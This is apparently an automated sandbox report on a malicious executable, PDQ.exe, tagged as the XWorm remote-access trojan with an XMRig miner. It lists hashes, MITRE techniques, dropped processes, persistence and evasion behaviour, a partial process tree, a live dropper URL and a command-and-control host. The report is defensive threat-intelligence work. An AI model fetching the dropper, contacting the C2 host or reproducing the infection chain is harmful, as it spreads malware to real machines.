xmrig | 992e1b04e74323754e32bbbe30ea47a14d0c9f2f99d6502de74b2717afa11d96

Analysis

max time kernel
90s
max time network
130s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
06/03/2025, 11:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PDQ.exe
Size

98.0MB
MD5

be2b5bf1035e68a780e62b0144f02f53
SHA1

0bc89eb756819cf816f52b2378ad7243dce0f65a
SHA256

98a48e68768486746f7eec87a16cebd0021d2e885a6b68b2574407898cb04457
SHA512

59b6386acae2299cf72e5ff3114bff013bb97f4d8f3b8388825acc7d681519b7f7a5854048b3855fa84af2914811947827cb49f6998d7a285341a3abdeda7642
SSDEEP

3145728:oHhFswX+P6BJOTM8bk8KxJkagkCI/8rd2:oHROP6BalkkadbSU

Score

10^/10

xmrig xworm defense_evasion discovery execution miner persistence privilege_escalation pyinstaller rat trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://envs.sh/E3L.exe

Extracted

Family

xworm

abstract-respond.gl.at.ply.gg:32953

Attributes

Install_directory
%ProgramData%
install_file
Windows Defender.exe

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0007000000023db7-168.dat	family_xworm
behavioral1/memory/3372-340-0x0000000000AD0000-0x0000000000B16000-memory.dmp	family_xworm

Xmrig family
xmrig
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral1/memory/3144-377-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3144-376-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3144-381-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3144-383-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3144-382-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3144-380-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3144-379-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3144-813-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3144-814-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Blocklisted process makes network request 2 IoCs

flow	pid	Process
54	4228	powershell.exe
56	456	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4492	powershell.exe
5736	powershell.exe
3648	powershell.exe
4516	powershell.exe
5560	powershell.exe
6124	powershell.exe
4228	powershell.exe
456	powershell.exe

Downloads MZ/PE file 2 IoCs

flow	pid	Process
54	4228	powershell.exe
56	456	powershell.exe

Checks computer location settings 2 TTPs 19 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	Seporant.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	DlpUserAgent.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	DlpUserAgent.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	PDQ.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	Telegram Web.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	Sinergiay.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	Telegram Web.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	PDQ.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	Seporant.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	Sinergiay.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	Windows Defender.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DlpUserAgent.exe	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DlpUserAgent.exe	powershell.exe

Executes dropped EXE 41 IoCs

pid	Process
2940	Seporant.exe
5080	TMPDE45.tmp.exe
3524	TEMP.exe
2796	Comms.exe
852	Telegram Web.exe
4012	Seporant.exe
3468	TMPDE45.tmp.exe
2344	TEMP.exe
208	Comms.exe
4540	Telegram Web.exe
4560	Remote.exe
1708	Remote.exe
2068	Ram.exe
4576	Sinergiay.exe
3396	Roman.exe
1604	Roman.exe
3372	Windows Defender.exe
4924	Rem.exe
1924	Remote.exe
1624	Remote.exe
3692	Ram.exe
4920	Sinergiay.exe
4476	Windows Defender.exe
3680	DlpUserAgent.exe
556	Rem.exe
4420	Roman.exe
1088	Roman.exe
1940	Vulture.exe
5160	Lenochka.exe
5268	Vulture.exe
5652	Lenochka.exe
5884	Windows Defender.exe
5956	Rem.exe
6020	DlpUserAgent.exe
184	Vulture.exe
3096	Lenochka.exe
5172	Lenochka.exe
5648	Vulture.exe
5532	Rem.exe
5540	Windows Defender.exe
1280	Seporant.exe

Loads dropped DLL 36 IoCs

pid	Process
1708	Remote.exe
1708	Remote.exe
1708	Remote.exe
1708	Remote.exe
1708	Remote.exe
1604	Roman.exe
1604	Roman.exe
1604	Roman.exe
1604	Roman.exe
1604	Roman.exe
1624	Remote.exe
1624	Remote.exe
1624	Remote.exe
1624	Remote.exe
1624	Remote.exe
1088	Roman.exe
1088	Roman.exe
1088	Roman.exe
1088	Roman.exe
1088	Roman.exe
5268	Vulture.exe
5268	Vulture.exe
5268	Vulture.exe
5652	Lenochka.exe
5652	Lenochka.exe
5652	Lenochka.exe
5652	Lenochka.exe
5652	Lenochka.exe
5172	Lenochka.exe
5172	Lenochka.exe
5172	Lenochka.exe
5648	Vulture.exe
5172	Lenochka.exe
5172	Lenochka.exe
5648	Vulture.exe
5648	Vulture.exe

Power Settings 1 TTPs 16 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
2672	powercfg.exe
5184	powercfg.exe
5176	powercfg.exe
3176	powercfg.exe
2236	powercfg.exe
1852	powercfg.exe
4508	powercfg.exe
5192	powercfg.exe
5168	powercfg.exe
5288	powercfg.exe
5904	powercfg.exe
4468	powercfg.exe
3692	powercfg.exe
4556	powercfg.exe
396	powercfg.exe
5932	powercfg.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4924 set thread context of 3144	4924	Rem.exe	161

UPX packed file 23 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023dc0-193.dat	upx
behavioral1/memory/4576-279-0x0000000140000000-0x0000000140023000-memory.dmp	upx
behavioral1/memory/3144-373-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3144-375-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3144-377-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3144-376-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3144-374-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3144-371-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3144-370-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3144-381-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3144-383-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3144-382-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3144-380-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3144-379-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4576-448-0x0000000140000000-0x0000000140023000-memory.dmp	upx
behavioral1/memory/4920-459-0x0000000140000000-0x0000000140023000-memory.dmp	upx
behavioral1/memory/3680-475-0x0000000000400000-0x000000000041D000-memory.dmp	upx
behavioral1/memory/3680-628-0x0000000000400000-0x000000000041D000-memory.dmp	upx
behavioral1/memory/6020-649-0x0000000000400000-0x000000000041D000-memory.dmp	upx
behavioral1/memory/6020-688-0x0000000000400000-0x000000000041D000-memory.dmp	upx
behavioral1/memory/4920-771-0x0000000140000000-0x0000000140023000-memory.dmp	upx
behavioral1/memory/3144-813-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3144-814-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Access Token Manipulation: Create Process with Token 1 TTPs 12 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
1736	cmd.exe
876	cmd.exe
4448	cmd.exe
1148	cmd.exe
1612	cmd.exe
5196	cmd.exe
3684	cmd.exe
4208	cmd.exe
1504	cmd.exe
5744	cmd.exe
5944	cmd.exe
5608	cmd.exe

Detects Pyinstaller 4 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0007000000023db6-165.dat	pyinstaller
behavioral1/files/0x0007000000023db9-173.dat	pyinstaller
behavioral1/files/0x0007000000023dbd-184.dat	pyinstaller
behavioral1/files/0x0007000000023dbe-187.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 32 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TMPDE45.tmp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Telegram Web.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DlpUserAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ram.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Telegram Web.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TMPDE45.tmp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DlpUserAgent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ram.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Kills process with taskkill 64 IoCs

defense_evasion

pid	Process
5476	taskkill.exe
5880	taskkill.exe
2456	taskkill.exe
4428	taskkill.exe
3116	taskkill.exe
5524	taskkill.exe
6128	Process not Found
5900	taskkill.exe
6072	taskkill.exe
1100	taskkill.exe
3804	taskkill.exe
6052	taskkill.exe
5756	taskkill.exe
5788	taskkill.exe
5784	taskkill.exe
5704	taskkill.exe
4876	taskkill.exe
5340	taskkill.exe
5320	taskkill.exe
5796	taskkill.exe
5188	taskkill.exe
6140	taskkill.exe
4464	taskkill.exe
3568	taskkill.exe
5564	taskkill.exe
1320	taskkill.exe
3396	taskkill.exe
3232	taskkill.exe
3804	taskkill.exe
5988	taskkill.exe
4236	Process not Found
5660	taskkill.exe
5996	taskkill.exe
6036	taskkill.exe
1280	taskkill.exe
4468	taskkill.exe
936	taskkill.exe
2160	taskkill.exe
2884	taskkill.exe
5252	taskkill.exe
3612	taskkill.exe
2068	Process not Found
1852	Process not Found
5672	taskkill.exe
1292	taskkill.exe
5168	taskkill.exe
180	taskkill.exe
4852	taskkill.exe
5756	taskkill.exe
5480	taskkill.exe
5628	taskkill.exe
5852	taskkill.exe
4928	taskkill.exe
3228	taskkill.exe
4596	taskkill.exe
5376	Process not Found
1092	taskkill.exe
1768	taskkill.exe
5560	taskkill.exe
636	taskkill.exe
3648	taskkill.exe
5224	taskkill.exe
5836	taskkill.exe
1428	Process not Found

Modifies registry class 6 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings	PDQ.exe
Key created	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings	PDQ.exe
Key created	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings	Telegram Web.exe
Key created	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings	Telegram Web.exe

Opens file in notepad (likely ransom note) 3 IoCs

ransomware

pid	Process
4548	notepad.exe
5444	notepad.exe
3548	notepad.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1780	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4492	powershell.exe
4492	powershell.exe
4492	powershell.exe
4228	powershell.exe
4228	powershell.exe
4924	Rem.exe
4924	Rem.exe
4924	Rem.exe
4924	Rem.exe
4924	Rem.exe
4228	powershell.exe
3648	powershell.exe
3648	powershell.exe
3144	conhost.exe
3144	conhost.exe
3648	powershell.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
456	powershell.exe
456	powershell.exe
456	powershell.exe
3144	conhost.exe
3144	conhost.exe
556	Rem.exe
556	Rem.exe
556	Rem.exe
556	Rem.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
5736	powershell.exe
5736	powershell.exe
3144	conhost.exe
3144	conhost.exe
5736	powershell.exe
3144	conhost.exe
3144	conhost.exe
5956	Rem.exe
5956	Rem.exe
5956	Rem.exe
5956	Rem.exe
3144	conhost.exe
3144	conhost.exe
4516	powershell.exe
4516	powershell.exe
4516	powershell.exe
3144	conhost.exe
3144	conhost.exe
5532	Rem.exe
5532	Rem.exe
5532	Rem.exe
5532	Rem.exe
3144	conhost.exe
3144	conhost.exe
5560	powershell.exe
5560	powershell.exe
3144	conhost.exe
3144	conhost.exe
5560	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
4712	7zFM.exe
5984	7zFM.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	4192	7zFM.exe
Token: 35	4192	7zFM.exe
Token: SeRestorePrivilege	4712	7zFM.exe
Token: 35	4712	7zFM.exe
Token: SeDebugPrivilege	3372	Windows Defender.exe
Token: SeDebugPrivilege	1104	taskkill.exe
Token: SeDebugPrivilege	3640	taskkill.exe
Token: SeDebugPrivilege	4492	powershell.exe
Token: SeDebugPrivilege	936	taskkill.exe
Token: SeDebugPrivilege	628	taskkill.exe
Token: SeDebugPrivilege	4228	powershell.exe
Token: SeShutdownPrivilege	4468	powercfg.exe
Token: SeCreatePagefilePrivilege	4468	powercfg.exe
Token: SeShutdownPrivilege	2672	powercfg.exe
Token: SeCreatePagefilePrivilege	2672	powercfg.exe
Token: SeShutdownPrivilege	4508	powercfg.exe
Token: SeCreatePagefilePrivilege	4508	powercfg.exe
Token: SeShutdownPrivilege	1852	powercfg.exe
Token: SeCreatePagefilePrivilege	1852	powercfg.exe
Token: SeDebugPrivilege	1184	taskkill.exe
Token: SeLockMemoryPrivilege	3144	conhost.exe
Token: SeLockMemoryPrivilege	3144	conhost.exe
Token: SeDebugPrivilege	3648	powershell.exe
Token: SeDebugPrivilege	2776	taskkill.exe
Token: SeDebugPrivilege	4476	Windows Defender.exe
Token: SeDebugPrivilege	456	powershell.exe
Token: SeDebugPrivilege	1592	taskkill.exe
Token: SeDebugPrivilege	1096	taskkill.exe
Token: SeShutdownPrivilege	5168	powercfg.exe
Token: SeCreatePagefilePrivilege	5168	powercfg.exe
Token: SeShutdownPrivilege	5184	powercfg.exe
Token: SeCreatePagefilePrivilege	5184	powercfg.exe
Token: SeShutdownPrivilege	5192	powercfg.exe
Token: SeCreatePagefilePrivilege	5192	powercfg.exe
Token: SeShutdownPrivilege	5176	powercfg.exe
Token: SeCreatePagefilePrivilege	5176	powercfg.exe
Token: SeDebugPrivilege	5736	powershell.exe
Token: SeDebugPrivilege	5852	taskkill.exe
Token: SeDebugPrivilege	5876	taskkill.exe
Token: SeDebugPrivilege	5884	Windows Defender.exe
Token: SeDebugPrivilege	5984	taskkill.exe
Token: SeDebugPrivilege	6052	taskkill.exe
Token: SeShutdownPrivilege	3692	powercfg.exe
Token: SeCreatePagefilePrivilege	3692	powercfg.exe
Token: SeShutdownPrivilege	396	powercfg.exe
Token: SeCreatePagefilePrivilege	396	powercfg.exe
Token: SeShutdownPrivilege	4556	powercfg.exe
Token: SeCreatePagefilePrivilege	4556	powercfg.exe
Token: SeShutdownPrivilege	5288	powercfg.exe
Token: SeCreatePagefilePrivilege	5288	powercfg.exe
Token: SeDebugPrivilege	2044	taskkill.exe
Token: SeDebugPrivilege	4516	powershell.exe
Token: SeDebugPrivilege	3116	taskkill.exe
Token: SeDebugPrivilege	5540	Windows Defender.exe
Token: SeDebugPrivilege	5836	taskkill.exe
Token: SeDebugPrivilege	5920	taskkill.exe
Token: SeShutdownPrivilege	5904	powercfg.exe
Token: SeCreatePagefilePrivilege	5904	powercfg.exe
Token: SeShutdownPrivilege	3176	powercfg.exe
Token: SeCreatePagefilePrivilege	3176	powercfg.exe
Token: SeShutdownPrivilege	5932	powercfg.exe
Token: SeCreatePagefilePrivilege	5932	powercfg.exe
Token: SeShutdownPrivilege	2236	powercfg.exe
Token: SeCreatePagefilePrivilege	2236	powercfg.exe

Suspicious use of FindShellTrayWindow 57 IoCs

pid	Process
4192	7zFM.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
5984	7zFM.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
5984	7zFM.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
5984	7zFM.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
5984	7zFM.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe

Suspicious use of SendNotifyMessage 52 IoCs

pid	Process
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe
3144	conhost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3372	Windows Defender.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4952 wrote to memory of 1172	4952	PDQ.exe	90
PID 4952 wrote to memory of 1172	4952	PDQ.exe	90
PID 1172 wrote to memory of 2884	1172	WScript.exe	91
PID 1172 wrote to memory of 2884	1172	WScript.exe	91
PID 5012 wrote to memory of 372	5012	PDQ.exe	101
PID 5012 wrote to memory of 372	5012	PDQ.exe	101
PID 372 wrote to memory of 2344	372	WScript.exe	102
PID 372 wrote to memory of 2344	372	WScript.exe	102
PID 1172 wrote to memory of 4732	1172	WScript.exe	104
PID 1172 wrote to memory of 4732	1172	WScript.exe	104
PID 4732 wrote to memory of 2940	4732	cmd.exe	106
PID 4732 wrote to memory of 2940	4732	cmd.exe	106
PID 2940 wrote to memory of 5080	2940	Seporant.exe	108
PID 2940 wrote to memory of 5080	2940	Seporant.exe	108
PID 2940 wrote to memory of 5080	2940	Seporant.exe	108
PID 2940 wrote to memory of 3524	2940	Seporant.exe	109
PID 2940 wrote to memory of 3524	2940	Seporant.exe	109
PID 2940 wrote to memory of 2796	2940	Seporant.exe	110
PID 2940 wrote to memory of 2796	2940	Seporant.exe	110
PID 2940 wrote to memory of 852	2940	Seporant.exe	111
PID 2940 wrote to memory of 852	2940	Seporant.exe	111
PID 2940 wrote to memory of 852	2940	Seporant.exe	111
PID 852 wrote to memory of 2248	852	Telegram Web.exe	112
PID 852 wrote to memory of 2248	852	Telegram Web.exe	112
PID 852 wrote to memory of 2248	852	Telegram Web.exe	112
PID 372 wrote to memory of 4864	372	WScript.exe	113
PID 372 wrote to memory of 4864	372	WScript.exe	113
PID 4864 wrote to memory of 4012	4864	cmd.exe	115
PID 4864 wrote to memory of 4012	4864	cmd.exe	115
PID 4012 wrote to memory of 3468	4012	Seporant.exe	116
PID 4012 wrote to memory of 3468	4012	Seporant.exe	116
PID 4012 wrote to memory of 3468	4012	Seporant.exe	116
PID 4012 wrote to memory of 2344	4012	Seporant.exe	117
PID 4012 wrote to memory of 2344	4012	Seporant.exe	117
PID 4012 wrote to memory of 208	4012	Seporant.exe	118
PID 4012 wrote to memory of 208	4012	Seporant.exe	118
PID 4012 wrote to memory of 4540	4012	Seporant.exe	119
PID 4012 wrote to memory of 4540	4012	Seporant.exe	119
PID 4012 wrote to memory of 4540	4012	Seporant.exe	119
PID 4540 wrote to memory of 1480	4540	Telegram Web.exe	120
PID 4540 wrote to memory of 1480	4540	Telegram Web.exe	120
PID 4540 wrote to memory of 1480	4540	Telegram Web.exe	120
PID 2248 wrote to memory of 4560	2248	WScript.exe	122
PID 2248 wrote to memory of 4560	2248	WScript.exe	122
PID 2248 wrote to memory of 4028	2248	WScript.exe	123
PID 2248 wrote to memory of 4028	2248	WScript.exe	123
PID 2248 wrote to memory of 4028	2248	WScript.exe	123
PID 2248 wrote to memory of 5012	2248	WScript.exe	125
PID 2248 wrote to memory of 5012	2248	WScript.exe	125
PID 2248 wrote to memory of 5012	2248	WScript.exe	125
PID 4560 wrote to memory of 1708	4560	Remote.exe	129
PID 4560 wrote to memory of 1708	4560	Remote.exe	129
PID 2248 wrote to memory of 2068	2248	WScript.exe	128
PID 2248 wrote to memory of 2068	2248	WScript.exe	128
PID 2248 wrote to memory of 2068	2248	WScript.exe	128
PID 4028 wrote to memory of 3684	4028	cmd.exe	130
PID 4028 wrote to memory of 3684	4028	cmd.exe	130
PID 4028 wrote to memory of 3684	4028	cmd.exe	130
PID 2248 wrote to memory of 3676	2248	WScript.exe	131
PID 2248 wrote to memory of 3676	2248	WScript.exe	131
PID 2248 wrote to memory of 3676	2248	WScript.exe	131
PID 5012 wrote to memory of 1736	5012	cmd.exe	133
PID 5012 wrote to memory of 1736	5012	cmd.exe	133
PID 5012 wrote to memory of 1736	5012	cmd.exe	133

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\PDQ.exe
"C:\Users\Admin\AppData\Local\Temp\PDQ.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4952
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Lopinarca.vbs"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:1172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Lemon.bat" "
    3⤵
    PID:2884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4343.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4732
  - - C:\Users\Admin\AppData\Local\Temp\Seporant.exe
      Seporant.exe -pjYfhxrtFdPYPTWrdqBZB -dC:\Users\Admin\AppData\Local\Temp
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2940
    - - C:\Users\Admin\AppData\Local\Temp\TMPDE45.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\TMPDE45.tmp.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5080
    - - C:\Users\Admin\AppData\Local\Temp\TEMP.exe
        
        "C:\Users\Admin\AppData\Local\Temp\TEMP.exe"
        5⤵
        Executes dropped EXE
        
        PID:3524
    - - C:\Users\Admin\AppData\Local\Temp\Comms.exe
